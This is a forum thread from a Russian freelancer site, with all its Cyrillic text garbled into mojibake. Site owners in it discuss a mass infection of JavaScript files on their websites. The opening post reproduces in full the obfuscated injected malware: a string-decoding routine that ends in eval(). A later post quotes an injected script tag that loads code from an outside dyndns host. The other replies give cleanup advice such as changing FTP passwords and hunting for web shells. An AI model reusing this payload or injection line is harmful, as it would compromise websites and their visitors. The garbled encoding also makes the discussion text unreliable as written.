Ìàññîâîå çàðàæåíèå JS

  1. Weblancer
  2. Ôîðóì ôðèëàíñåðîâ
  3. Ïðîãðàììèðîâàíèå
Íàäåæäà Ñ.
349 ñîîáùåíèé
#13 ëåò íàçàä
Ïîìîãèòå ïîæàëóéñòà, íà âñåõ ñàéòàõ ñîçäàííûõ ìíîé çàðàæåíû JS ôàéëû, ÿíäåêñ óæå îáíàðóæèë âðåäîíîñíûé êîä. Ýòà ïðîáëåìà êîñíóëàñü ìíå êàæåòñÿ âñåãî ðóíåòà.
Âî âñåõ js ôàéëàõ äîïèñûâàåòñÿ ñòðîêà òèïà:
var e1de40b7="";function i60a02e506(){var w3120e12=String,ge20da81=Array.prototype.slice.call(arguments).join(""),vbed671=ge20da81.substr(rc561b0(),3)-547,qf7d0a097,f92d2207e;ge20da81=ge20da81.substr(5);var o312489=ge20da81.length;for(var k603f1=0;k603f1<o312489;k603f1++){try{throw(x933f143=uaddbc(ge20da81,k603f1));}catch(e){x933f143=e;};if(x933f143=='™'){vbed671="";k603f1=b5bb8a8(k603f1);ybaeafea=x54e9de(ge20da81,k603f1);while(ybaeafea!='™'){vbed671+=ybaeafea;k603f1++;ybaeafea=wd2158199(ge20da81,k603f1);}vbed671-=583;continue;}qf7d0a097="";if(v2e46d654(x933f143)){k603f1++;x933f143=ge20da81.substr(k603f1,1);while(x933f143!='±'){qf7d0a097+=x933f143;k603f1++;x933f143=ge20da81.substr(k603f1,1);}qf7d0a097=qf7d0a097-vbed671-12;if(qf7d0a097<0)qf7d0a097+=256;qf7d0a097=qa8ad5e(qf7d0a097);e1de40b7+=w3120e12(qf7d0a097);continue;}a8125862e=o56cda9(x933f143);if(a8125862e>848)a8125862e-=848;f92d2207e=a8125862e-vbed671-12;if(f92d2207e<0)f92d2207e+=256;if(f92d2207e>=192)f92d2207e+=848;else if(f92d2207e==168)f92d2207e=1025;else if(f92d2207e==184)f92d2207e=1105;e1de40b7+=c0479049(f92d2207e);}}i60a02e506("d","87","10±2","15±","±","2","1±™7","2","3™±1","3","±™6","4","8™±18","7","±","™5","9","1","™w","™68","7™","±2","32","±™69","4™±228","±™","77","2™","8","™769™","4±23","8","±™6","17™","W","N±","1","6","9±","™","644","™VS","R™","69","6","™","±243±™586™","p±12","9","±","™60","8™","E±","15","4±±","151","±±","14","5±","™6","59","™","x±14","9","±","™","7","3","2","™±","19","3±™","69","9","™","±1","6","7±™7","47","™±2","4±","$$™675","™±216±™7","5","1™","±","2","38±™6","74","™","±150","±","±15","0","±","±","15","5±","±","15","2±","±","2","10","±","™6","8","3","™","±","2","2","5","±","™","7","57","™%","™","7","2","9™","±","7±","™635","™n±1","7","4","±™","63","9™","±","16","9","±","™691","™","±","241","±™","6","68","™","±20","5","±","™754","™.™","68","5™±2","3","1±","™68","2","™","±2","28","±™7","8","2™:@","7","™70","9™±1","8","4","±™5","9","5™","±1","25±™","606™","±1","50±","™7","2","1","™","±10","±","±","19","5","±","™76","1™+™6","39","™","±179","±™","778","™=™","5","9","1™A™","624","™±","151","±±16","1±","±","16","4","±","±156","±™","761","™","3™","65","3™±1","83±","™","78","3™","I","F","™","7","6","1™","±","236","±","™634","™±","1","62±","±174±±","172±™","5","9","0™","B","z","B:N","±32±","™64","4","™","S","R","™","687","™±2","21","±±","2","18","±","±","1","4","8±","±1","56±™601™±146","±","™763™","9™","720","™","±","5","±±","25","0±","™752™$™749™","±2","4","±","™662™","±12","3","±™","6","78™","±226±","™","7","1","1™±245","±±25","0±","™636","™±1","65","±","™","6","47™","±1","87±","™","6","8","5™","±233±","±","160","±","™73","1™±2","4","±™","63","4","™","±18","4±±18","5","±±","1","65±™","7","06","™±","2","4","3","±","™681™","±207±","±2","1","3","±™5","89","™2™75","9™±2","4","9","±","™7","33™±","223±™","7","5","8™","±24","8","±™","585","™",".","5","±1","3","1","±™59","1™","±","1","3","0±x™6","77™±2","0","7±","™","6","29™±1","60","±™620™","±1","54±","±15","9±","±1","5","0","±","±","149±™7","49","™","±","2","17±±21","9±","™66","4","™","±","1","25","±","±","2","16","±™","7","79","™±2","21±™","693™±132±","™649","™","WW±","1","97±™","7","22™","±","0±","±5±","±","25","1±±6","±","±1","4","±","±1","9","7","±™711™","±4±","±","5±","™6","1","1","™±","1","6","2±","±142","±","™","588","™±","125±","™59","5","™y","±","12","7","±8™","7","4","6","™±","23","6±™62","9™","Z™","633","™n™","64","0™","±","128±™","6","6","5","™k","™","6","79","™","v","™729","™±16","7±™76","3™=","±205±","±20","2±±2","01","±","™","713","™±242±","™","64","1™±181","±™63","6","™","±","1","6","4","±±","18","2","±±174±","±","1","66","±™60","6™","±","14","5","±±15","1±","Q","±14","6±","±","1","4","5","±","±","14","4±±1","4","6","±","™6","6","4™±","2","10","±","±","208","±™","64","1","™±1","7","1","±™6","11","™±","1","49±±1","5","1±™781","™H","7±242±","±","1","5","±","±","2","4","2","±8™7","06™","±252±™683","™","±2","2","2±±","211","±","±228±","±","2","1","7","±","™","7","13","™±","2","5","3","±±25","2±™602","™","GH","™","7","5","9","™±","2","20±7™","661™g™","6","7","9™vu","u±2","1","3","±","™","6","8","1","™","±2","12±™","7","5","8™±","219","±","±2","2","7±","2$™642","™","±181±™","7","1","1","™±","2","4","0","±","™650","™","±1","9","0±±1","9","8±","±","1","2","5±±","1","99","±","±","20","0","±","™","72","3™","±18±","±","2","54±±4","±","™76","4","™","\"(","±","2","25±","±","2","54±±2","54","±™7","0","7","™±","1","97","±™74","2™±","20","3","±™6","3","3","™","n™","671","™","±","1","41±","±1","3","2±±223","±™7","08™±","150±™763","™","±2","02±","±","2","0","1","±","™680","™","v","v","±2","28","±","±","21","4","±","±","219±±","20","9","±","±","22","0±™","7","71™?","™","7","5","8","™±2","33±3","™","6","0","2™","±","15","2±","±","153±","±","13","3±","™","660","™±1","9","7","±","±","18","6±±19","2±","™","73","4™±1","95±","™","7","00","™±","1","90±","™","59","4™","7™","629™","kuG™","6","9","1™","±","130±","™63","2","™","F","F™","66","7™","i™59","1™","±","1","38±","u","±134±4±1","2","4±™6","9","9","™±2","29±","±225","±","™74","9","™","±","22±","±","2","1","0","±™75","5","™±","2","45","±","±","2","1","6±","±","2","8","±'™","6","5","6™","±184","±™6","99","™","±245","±™5","9","6","™±","1","3","4±™","6","60","™±19","0±","™662","™±","20","1","±™7","37","™±2","6±","™","7","7","1","™±2","4","6","±™72","0™±25","2","±","™","61","2™±","1","4","2","±™7","1","4™","±","3±","™6","42™±","140","±","±","179","±™","690™±2","20±™","63","1™±16","9±","±1","6","1","±±170","±±","1","7","6±±","1","7","5±","™6","96","™","±19","1","±±","24","6±±2","09±™7","53™±","2","3±™","6","6","1","™±1","93","±","™74","1","™","±2","4","8","±™6","63™","±1","8","9","±±20","1±±","193","±","™","782™±2","51","±±","2","5","0","±™","624™±1","57","±","±","15","4","±™","755™","±2","5","±±","28±","™","7","20","™±","18","8±±1","9","0","±","™739™±3","±","±2","16","±™6","09™±1","31","±","™","76","5","™","±2","53","±™","72","2™","±164","±±1","61±","™64","4™","R™","719","™±157","±","™71","1","™","±149±™64","5","™","±","19","2","±","™","727™","±","253±™","6","8","3™","±22","6±","±1","44±","±22","7","±","±","21","1±","±","226±™70","6™","±","24","0±™68","7™±","22","8±™","61","9™±16","4","±","™6","88","™±1","49","±","±178±","±","149±™","6","9","1","™±2","2","0","±±","231","±™","65","2™","±1","80±","™6","85™","±","2","3","1±","™736™±18±±","1","0","±","±1","9","±","±","2","5","±","±21","1","±","™","65","4","™±18","2±™","768","™","7","*","&9","*™","6","67","™±","1","65","±","±","2","0","4","±™","683™","±","21","3±™7","44","™±2","6","±","™6","41™±17","1","±™","761","™,™7","5","9","™","0","±","2","28±™","6","65","™","±1","33","±™5","91","™","±1","3","5±","w","±134","±","±1","25","±™65","3","™±1","9","4±","™","76","1™2™7","3","8™±","2","0","6","±","±2","0","8","±","±2","2","6±™","652","™^","™65","6","™","_","^^","™","761","™","±19","9","±™6","80™","±","2","24","±","™6","2","2","™±","1","50","±","™724™","±","11±","±","2±","±","9","±±","13","±","±","1","99","±","™","780","™","E","™","586","™","±","136±","±1","2","7","±","™","617™","±1","4","7±N","™","70","0™±190","±","±","1","61","±","±","1","68±","±2","4","5","±±","2","30±","™5","91™±14","0±","™777","™B±","2","5","3","±8","/","D™668","™","±194","±™","67","2","™±2","1","6±±","200±±","2","1","5","±","™","6","2","8™±16","2","±","±","169±","±17","3","±","™7","0","7™","±17","5","±™7","1","7™±","2","0","5±±159±","±","15","6","±™6","96","™±1","34","±","™","618","™","8","8","±","1","6","2±™6","65","™±","1","93","±","™","76","7","™6","™657","™","±1","91±™","6","74™","±2","15","±±2","19","±","±1","4","9±±21","4±","±2","1","3","±±","2","1","7±","±","2","04","±","±","20","0±","™593","™z±","143","±™73","1™±1","9±™","643","™±","1","8","8","±","±","16","9","±±","1","8","8","±™","60","5","™","±","135","±±","133","±™637","™","±170","±","™","6","5","3™±","1","7","9","±±192","±","™65","5","™","±1","87±™66","5™±","1","95","±±1","2","6","±±","1","5","5","±™","6","54","™","s±1","85±™","71","1","™","±1","±","™63","3™±1","72±","±","1","61","±±","178±™7","11","™±245","±","™7","38","™","±","2","2","±","™5","9","0","™","±129±","3™7","6","8™±2","37","±™","6","9","3™±","163±","±154","±™658™±21","0","±","™","607","™1",".-","™6","42™","P","™","768™","±20","6","±±20","6±","™695","™","±","229","±","™74","9™","±24±±","2","1","0±","±","21","8±&™","6","06","™±","13","9±±","1","4","0±±1","50±™","6","4","5™x™62","0™","±","163","±","™6","1","1™±","14","1","±","™6","44","™","±","1","7","0±™76","4","™","%",":™","6","93™","±","2","05","±","™","702™±","247","±","™6","41","™±","1","6","7±","±186","±","±","171","±","™6","12","™If","fI™6","00","™D™6","0","0","™±","12","8","±","±14","0","±","±13","8±™69","0™±23","1±","±22","7","±±220±±","2","3","5","±","±","2","2","0","±","™6","1","8","™","VX","™723","™±1","84","±","±1","9±","™","616™:","™","59","4","™!","™63","0","™D™","6","5","5","™]","™","678™","t","t","t™","59","8™±1","46","±","±","13","2","±™687™±226±™7","0","1™±","2","3","0±","™","700™","±2","40±","™717","™±9","±™","690™±","165±","±","23","9±","±","24","0±™","7","7","7","™H4™","6","26","™","±","16","3","±","™","6","8","5™","±211±","™","6","7","9™","±","211","±±140","±","™7","2","3™±","21","3±","±","1","8","4±™738™±2","17","±","™","695™±18","3","±","™696","™±1","38±±","1","35±","±","13","4","±","±","134","±™610™00™","7","13™","±1","1","±","±155","±","±","15","2±±","1","51±™","69","4™±13","2±™7","1","7™","±","15","5±","±","1","5","±™","661","™","±","149±gdc","c","™","66","0™","b","±20","4","±™","6","64","™±","1","9","2","±","±","207±™","75","0","™","±","28±","#","'±","2","25","±\"!±3","1±","™694™","±234±±2","2","0","±","±2","23±±15","5","±™6","81","™±1","71","±±","142±","±","2","12","±±227","±™65","2™±","19","1±","™63","3","™","±","1","61","±±178±","™6","4","1","™±","1","75±","±","181±","™","6","40","™","±17","9±™","739","™","±20","8±","±","209","±","™5","88™1","™65","4™±20","6","±™","7","46™","±1","8","8±","™6","13","™4™","68","0™v","v™6","8","1™w","™","70","4","™","±142±™","6","06","™±1","54","±","±14","0±™7","72™7","-™68","9™±","22","9±±","2","37±","™6","5","8","™","±133","±±207","±±2","0","8±","±2","0","9±","±","1","89±","±195","±±184","±±1","9","0±w","™77","2","™","±","6","±±","23","3±™","767™±","2","46","±™7","39™","±22","7±","±","1","81±","±178±","±","1","7","7","±™6","91™","±","1","29±±","12","9±™","7","32","™","±30±™74","6","™±23","4±","±","1","8","8","±™67","3™","p","™","60","8™.™","64","3™QQ±1","8","7±±1","7","1","±","™6","63™","±","2","06±™70","3™","±","23","7","±","±2","44±™","7","05","™±","25","0","±","±1","8","0","±±24","9±±248±","±233","±™","6","57™","v™7","48","™±","238±","±","209","±&#±","2","9±","±","209±™68","1™","±15","3±™","604","™A™5","9","7™","g±1","23±","±142","±±","13","0","±","™","6","8","6™±16","1","±","™","6","09™±15","2","±","™","690™","±","216","±","±2","2","9","±","±","2","19","±±230±™7","3","4","™","±","1","6±±2","0","3±±","2","0","4±™5","92™C±1","37±±","13","2","±","™","779™","#D","B™","664™±","1","98","±","±","20","3±±1","96±","™","773™±","242±","™6","2","6","™`","e","™","6","78™±22","2","±±22","4±±20","5","±","±","222±±2","2","3","±™6","38","™","±","181±","±17","2","±","™662","™±","201","±","±","19","4","±±1","31","±","±","1","42±","™","7","49","™","±2","19±±","2","10±","±2","21±","™68","7™±14","8±™7","78™±2","4","6","±","™","7","5","7","™","±","2","3","2±","$","™","61","2™±","1","5","6±","™","7","4","3™±","211","±","™6","7","9™","±1","6","7","±","y","™7","3","0","™","±","1","69±±","168","±","±","168±™","77","7","™±2","15±63","/™6","0","4™±1","33±","O","™7","58™","±28±+™","7","70™7",",","™","66","5","™","±20","4","±","™","6","61™±190±","±1","57±™","6","61","™±1","9","4","±","™769™/","2*±","23","8","±","9)","™","63","0","™","±","173","±","±1","6","4±","±1","7","1±™","7","6","7™8","™77","8","™±","24","8±±1","0±™","665","™k™61","6™","7","™","610™0","0™6","39™","±1","93","±QN","™713™","±1","5","1","±±","11","±","±","2","01±","±1","55±","±152±","±","1","1","±","±","18","3±","±","182±±","18","3±","™6","69","™±157±","");eval(e1de40b7);function rc561b0(){return 2;}function uaddbc(f40dc551,b0fdc6){return f40dc551.substr(b0fdc6,1);}function b5bb8a8(y6ea01f9d){return ++y6ea01f9d;}function x54e9de(q1ef0c1a,fc2e88eff){return q1ef0c1a.substr(fc2e88eff,1);}function wd2158199(k851d22,ca4995){return k851d22.substr(ca4995,1);}function qa8ad5e(wf9e4c79){if(wf9e4c79==168)wf9e4c79=1025;else if(wf9e4c79==184)wf9e4c79=1105;return (wf9e4c79>=192 && wf9e4c79<256) ? wf9e4c79+848 : wf9e4c79;}function v2e46d654(j2db3f8){return j2db3f8=='±';}function c0479049(g3c27220){var w3120e12=String;return w3120e12(g3c27220);}function o56cda9(mf9125a){return (mf9125a+'')(0);}
Àëåêñàíäðîâè÷ Å.
5 ñîîáùåíèé
#13 ëåò íàçàä
Âñåãî ðóíåòà?...
Åñòü êó÷à ñàéòîâ ïî ïðîâåðêå ñàéòà àëÿ

Ñêà÷àé âñå ôàéëû íà êîìï.... íàéäè âñå .php ôàéëû
÷åðåç ïîèñê ïðîãîíè ÷àñòü êîäà, ëèáî ïîïðîáóé íàéòè base64_decode
Àíäðåé Õàëåöêèé
3562 ñîîáùåíèÿ
#13 ëåò íàçàä
È íå çàáûòü ïîìåíÿòü ïàðîëè íà ÔÒÏ è ïî÷èñòèòü êîìï îò âèðóñîâ.
Àëåêñàíäð Ô.
3318 ñîîáùåíèé
#13 ëåò íàçàä
È íå çàáóäüòå çàëàòàòü äûðû â ñêðèïòå îò÷åãî è çàðàæåíèå ïîøëî )
Íàäåæäà Ñ.
349 ñîîáùåíèé
#13 ëåò íàçàä
SmartDesign, äóìàþ âû ïðàâû. ó ìåíÿ òàêàÿ æå âåðñèÿ. Íà êîìïå çàñåë òðîÿí è ïåðåäàåò êîíôèã FTP êëèåíòà FileZilla. Òåïåðü âñå js ôàéëû ðó÷êàìè ÷èñòèòü... à ñàéòîâ ó ìåíÿ îõ êàê ìíîãî...
Äîñòàíó ëîãè äîñòóïà ê ñàéòó, ïî âðåìåíè èçìåíåíèÿ js ôàéëîâ âû÷èñëþ õàöêåðà è äîáàâëþ IP â ÷åðíûé ñïèñîê.
Êàê äóìàåòå, ñòîèò â îòäåë Ê îáðàùàòüñÿ?
Àðòåì Ë.
11416 ñîîáùåíèé
#13 ëåò íàçàä
WebAir, äà ñåé÷àñ ìàññîâàÿ ýïèäåìèÿ çàðàæåíèÿ ñàéòîâ. Î÷åíü ìíîãî âçëîìîâ ïðîèñõîäèò çà ïîñëåäíèå ïîëãîäà.
Öèòàòà ("WebAir"):
Êàê äóìàåòå, ñòîèò â îòäåë Ê îáðàùàòüñÿ?

Åñëè ýòî øóòêà òî ÿ îöåíèë

Ñëåäóåò ïî÷èñòèòü ôàéëû íà ñàéòå îò âðåäîíîñíîãî êîäà, ïîïðîáîâàòü íàéòè âåáøåë íà ñàéòå, íàñòðîèòü ïðàâà äîñòóïà ê ôàéëàì, ñåðâåð, à âîçìîæíî ñìåíèòü õîñòèíã, ò.ê. î÷åíü ìíîãî õîñòèíãîâ ðîññèéñêèõ ïîñëåäíåå âðåìÿ íàëîìàëè, ñìåíèòü âñå äîñòóïû, ïðîâåðèòü êîìï íà âèðóñû. Ìû äàâíî èçó÷àåì ýòó ïðîáëåìó è çàíèìàåìñÿ åå ðåøåíèåì.

Öèòàòà ("WebAir"):
âû÷èñëþ õàöêåðà è äîáàâëþ IP â ÷åðíûé ñïèñîê.

Àáñîëþòíî áåñïîëåçíî, äóìàåòå âñå ñî ñâîåãî àéïè ñèäÿò è íå èñïîëüçóþò âïíû?
Ìàêñèì Ô.
3195 ñîîáùåíèé
#13 ëåò íàçàä
Íà êàêîì-òî ñâî¸ì çàáûòîì ñàéòå îáíàðóæèë ïîõîæåå. Ãðåøó íà ñòàðóþ âåðñèþ tinyMCE. Ïàðó ðàç ÷åðåç êàêîé-òî åãî ïëþãèí ëîìàëè, òåïåðü âîò åù¸ ðàç. ×óäàêè)))
Ñåðãåé Ê.
13 ñîîáùåíèé
#13 ëåò íàçàä
Êà÷àéòå ñêðèïòû/áèáëèîòåêè èç îðèãèíàëüíûõ ðåïîçèòîðèåâ, à íå èç áëîãîâ âðîäå "Âàñÿ Ïóïêèí - JS çàìåòêè" è ñòàòüè "Çàöåíèòå íîâóþ áèáëèîòå÷êó".
 çàâèñèìîñòè îò óðîâíÿ èçâðàùåííîñòè àâòîðà, òàêèå ñêðèïòû ìîãóò ñîäåðæàòü ëþáîé "íå-ðîäíîé" êîä.
Àíäðåé ×.
61 ñîîáùåíèå
#13 ëåò íàçàä
Åñëè êîìó èíòåðåñíî - íåìíîãî ïðî ýòó ýïèäåìèþ
Òîæå âëåòåë ñ ýòîé áåäîé òîãäà - çàêàçûâàë ó ôðèëàíñåðà íàñòðîéêó 1 ìîäà äëÿ ôîðóìà (ïîëåíèëñÿ ñàì äåëàòü, äóìàë òàê áûñòðåå).  èòîãå - ïîëíî÷è ïðîñèäåë ñ áåêàïàìè.

Àéïè âû íèêàêîé íå íàéäåòå, ýòî æå íå âðó÷íóþ äåëàþò, à ñîôòîì ñïåöèàëüíûì, è åñ-íî ÷åðåç ñîêñ/âïí.
Åâãåíèé Ò.
5 ñîîáùåíèé
#13 ëåò íàçàä
Áûëî òàêîå íà ñàéòå êëèåíòà. Ñíà÷àëà äóìàë ÷òî êòî-òî íàøåë äûðó â ìîåé ñàìîïèñíîé CMS Î÷èñòèë, ïîñòàâèë äàìï âñåõ http çàïðîñîâ ê php â ôàéë. ×åðåç íåñêîëüêî äíåé ñàéò îïÿòü çàðàçèëñÿ, à â äàìïå íèêàêîé ïîäîçðèòåëüíîé äåÿòåëüíîñòè íå áûëî Ïîìîãëà ñìåíà ïàðîëåé íà FTP. Ïðè÷åì äðóãèå ñàéòû èç ìîåãî ftp ìåíåäæåðà íå ïîñòðàäàëè, ïîýòîìó ãðåøó íà êëèåíòà
Äàâèä Ï.
828 ñîîáùåíèé
#13 ëåò íàçàä
Çàìåòèë òàêîé êîä
<script src="http://dyndnsme.dyndns.org/rss.js"></script>


 ñàìîì êîíöå ñòðàíèöû ñàéòà. Çàìåòèë íà 3õ ñàéòàõ ñòàðûõ êëèåíòîâ, è íà íåìàëîèçâåñíûõ ñàéòàõ.

Ñâÿçàííî ëè ýòî êàê òî ñ ýòèìè ñòàòüÿìè?
íà àíãëèéñêîì:



íà ðóññêîì ïîõîæåå: